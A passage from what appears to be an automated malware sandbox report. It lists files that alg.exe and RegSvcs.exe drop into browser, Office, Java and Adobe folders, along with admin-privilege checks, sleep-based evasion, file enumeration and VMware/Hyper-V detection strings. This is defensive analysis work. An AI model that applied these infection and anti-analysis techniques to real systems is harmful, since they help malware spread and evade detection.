              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-locale-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-heap-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-namedpipe-l1-1-0.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-rtlsupport-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\nssdbm3.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-string-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\freebl3.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-2-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\softokn3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\System32\SensorDataService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_29-5850)
              Source: C:\Windows\System32\snmptrap.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_22-5753)
              Source: C:\Windows\System32\wbengine.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_23-5945)
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_25-5757)
              Source: C:\Windows\System32\vds.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\FXSSVC.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_21-5684)
              Source: C:\Windows\System32\msdtc.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_24-5705)
              Source: C:\Windows\System32\Spectrum.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\AgentService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\AppVClient.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_17-5659)
              Source: C:\Windows\System32\TieringEngineService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\Locator.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_27-5650)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396 | Thread sleep count: 3587 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3152 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792 | Thread sleep count: 37 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2552 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2320 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\alg.exe TID: 5508 | Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\alg.exe TID: 4316 | Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\msdtc.exe TID: 4600 | Thread sleep count: 487 > 30
              Source: C:\Windows\System32\msdtc.exe TID: 4600 | Thread sleep time: -48700s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\alg.exe | Last function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004098A0 FindFirstFileW,FindNextFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D0A0 FindFirstFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00415610 FindFirstFileW,FindNextFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D06E FindFirstFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041303C FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040989F FindFirstFileW,FindNextFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004111C4 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00415610 FindFirstFileW,FindNextFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041158C FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00411590 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00412D9C FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00416748 GetSystemInfo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\alg.exe | Thread delayed: delay time: 60000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWu
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device^
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
              Source: Spectrum.exe, 0000001F.00000003.1519906958.00000000005B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter2Hg\
              Source: Spectrum.exe, 0000001F.00000002.2647404908.0000000000538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DORMicrosoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver62fa-6a88-b6be-d17
              Source: SensorDataService.exe, 0000001D.00000003.1513774156.0000000000641000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001243000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1508234940.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1543980844.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790797442.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1555987738.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2090939732.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2065019404.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2125327568.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2069852108.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1521291058.0000000000521000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device>a]
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1523593271.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
              Source: AppVClient.exe, 00000011.00000003.1463140549.000000000011F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000003.1463294728.000000000014F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000002.1465148556.0000000000150000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
